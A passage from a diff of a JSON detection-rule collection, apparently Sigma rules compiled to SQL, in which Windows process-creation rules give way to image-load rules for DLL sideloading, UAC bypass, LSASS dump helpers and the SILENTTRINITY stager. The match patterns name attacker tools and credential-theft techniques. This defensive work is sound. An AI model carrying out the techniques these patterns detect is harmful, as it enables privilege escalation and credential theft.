ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%start%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.spl%' ESCAPE '\\' OR CommandLine LIKE '%route add%' ESCAPE '\\' OR CommandLine LIKE '%program files%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%add portopening%' ESCAPE '\\' OR CommandLine LIKE '%rule name%' ESCAPE '\\')))) OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%.spl%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vss\\_ps.dll' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\clussvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dismhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\inetsrv\\\\appcmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\searchindexer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\srtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tiworker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\SystemPropertiesAdvanced.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 
'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (CommandLine LIKE 'C:\\\\$WinREAgent\\\\Scratch\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_spoolsv_susp_child_processes.yml" + "filename": "image_load_dll_vss_ps_susp_load.yml" }, { - "title": "Script Event Consumer Spawning Process", - "id": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", - "status": "experimental", - "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", - "author": "Sittikorn S", + "title": "Fax Service DLL Search Order Hijack", + "id": "828af599-4c53-4ed2-ba4a-a9f835c434ea", + "status": "test", + "description": "The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.", + "author": "NVISO", "tags": [ - "attack.execution", - "attack.t1047" + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\fxssvc.exe' ESCAPE '\\' AND ImageLoaded LIKE '%ualapi.dll' ESCAPE '\\') AND NOT 
(ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_scrcons_susp_child_process.yml" + "filename": "image_load_side_load_ualapi.yml" }, { - "title": "Suspicious PowerShell Child Processes", - "id": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", - "status": "experimental", - "description": "Detects suspicious child processes spawned by PowerShell", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "Load Of Dbghelp/Dbgcore DLL From Suspicious Process", + "id": "0e277796-5f23-4e49-a490-483131d4f6e1", + "status": "test", + "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecraft use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", + "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName 
LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dnx.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE 'C:\\\\WINDOWS\\\\winsxs\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\TiWorker.exe -Embedding' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_susp_child_processes.yml" + "filename": "image_load_dll_dbghelp_dbgcore_susp_load.yml" }, { - "title": "Suspicious Obfuscated PowerShell Code", - "id": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", + "title": "Microsoft Office DLL Sideload", + "id": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", "status": 
"experimental", - "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%IAAtAGIAeABvAHIAIAAwAHgA%' ESCAPE '\\' OR CommandLine LIKE '%AALQBiAHgAbwByACAAMAB4A%' ESCAPE '\\' OR CommandLine LIKE '%gAC0AYgB4AG8AcgAgADAAeA%' ESCAPE '\\' OR CommandLine LIKE '%AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg%' ESCAPE '\\' OR CommandLine LIKE '%AuAEkAbgB2AG8AawBlACgAKQAgAHwAI%' ESCAPE '\\' OR CommandLine LIKE '%ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE 
'%B7ADAAfQB7ADMAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\outllib.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_encoded_obfusc.yml" + "filename": "image_load_side_load_office_dlls.yml" }, { - "title": "Control Panel Items", - "id": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", + "title": "HackTool - SILENTTRINITY Stager DLL Load", + "id": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", "status": "test", - "description": "Detects the malicious use of a control panel item", - "author": "Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)", + "description": "Detects SILENTTRINITY stager dll loading activity", + "author": "Aleksey Potapov, oscd.community", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218.002", - "attack.persistence", - "attack.t1546" + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%CurrentVersion\\\\Control Panel\\\\CPLs%' ESCAPE '\\')) OR (CommandLine LIKE '%.cpl' ESCAPE '\\' AND NOT (((CommandLine LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR CommandLine 
LIKE '%\\%System\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%regsvr32 %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\' AND CommandLine LIKE '%igfxCPL.cpl%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE Description LIKE '%st2stager%' ESCAPE '\\'" ], - "filename": "proc_creation_win_control_panel_item.yml" + "filename": "image_load_hktl_silenttrinity_stager.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher", - "id": "b222df08-0e07-11eb-adc1-0242ac120002", + "title": "UAC Bypass With Fake DLL", + "id": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", "status": "test", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Attempts to load dismcore.dll after dropping it", + "author": "oscd.community, Dmitry Uchakin", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Actions of a legitimate telnet client" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%clipboard]::%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\Dism\\\\dismcore.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_clip.yml" + "filename": "image_load_uac_bypass_via_dism.yml" }, { - "title": "Windows Update Client LOLBIN", - "id": "d7825193-b70a-48a4-b992-8b5b3015cc11", + "title": "Potential DLL Sideloading Of Non-Existent DLLs From System Folders", + "id": 
"6b98b92b-4f00-4f62-b4fe-4d1920215771", "status": "experimental", - "description": "Detects code execution via the Windows Update client (wuauclt)", - "author": "FPT.EagleEye Team", + "description": "Detects DLL sideloading of system dlls that are not present on the system by default. Usually to achieve techniques such as UAC bypass and privilege escalation", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.execution", - "attack.t1105", - "attack.t1218" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%/UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%/RunHandlerComServer%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ClassId %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT ((Signed = 'true' AND Signature = 'Microsoft Windows')))" ], - "filename": "proc_creation_win_wuauclt_execution.yml" + "filename": "image_load_side_load_non_existent_dlls.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION", - "id": "e9f55347-2928-4c06-88e5-1a7f8169942e", - "status": "test", - "description": "Detects 
Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "Potential System DLL Sideloading From Non System Locations", + "id": "4fc0deee-0057-4998-ab31-d24e46e0aba4", + "status": "experimental", + "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Legitimate applications loading their own versions of the DLLs mentioned in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%&&set%' ESCAPE '\\' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%{0}%' ESCAPE '\\' OR CommandLine LIKE '%{1}%' ESCAPE '\\' OR CommandLine LIKE '%{2}%' ESCAPE '\\' OR CommandLine LIKE '%{3}%' ESCAPE '\\' OR CommandLine LIKE '%{4}%' ESCAPE '\\' OR CommandLine LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\shfolder.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\activeds.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\adsldpc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aepic.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\apphelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\applicationframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxalluserstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxdeploymentclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\archiveint.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\audioses.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\auditpolcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authfwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\authz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\avrt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcd.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47langs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47mrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabinet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabview.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\certenroll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cldapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clipc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clusapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmpbk32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coloradapterclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\colorui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\comdlg32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\connect.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coremessaging.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptxml.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d2d1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10warp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d11.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d12.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d9.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dataexchange.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\davclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\defragproxy.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\desktopshellext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\deviceassociation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicecredential.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicepairing.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devrtl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc6.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\directmanipulation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcfgutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcmnutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenrollengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenterprisediagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmiso8601utils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmoleaututils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmprocessxmlfiltered.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmpushproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmxmlhelputils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dnsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3api.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3cfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsparse.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsreg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsrole.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dui70.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\duser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dusmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwrite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxgi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxva2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappcfg.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\eappprxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edputil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsadu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\esent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\execmodelproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\explorerframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fastprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\faultrep.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fddevquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\feclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\firewallapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\flightsettings.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fltlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpolicyiomgr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpuclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\getuname.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hnetmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\httpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\idstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ieadvpack.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iedkcs32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iertutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iri.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsidsc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsium.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\joinutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ksuser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ktmw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensemanagerapi.dll' ESCAPE '\\' OR ImageLoaded LIKE 
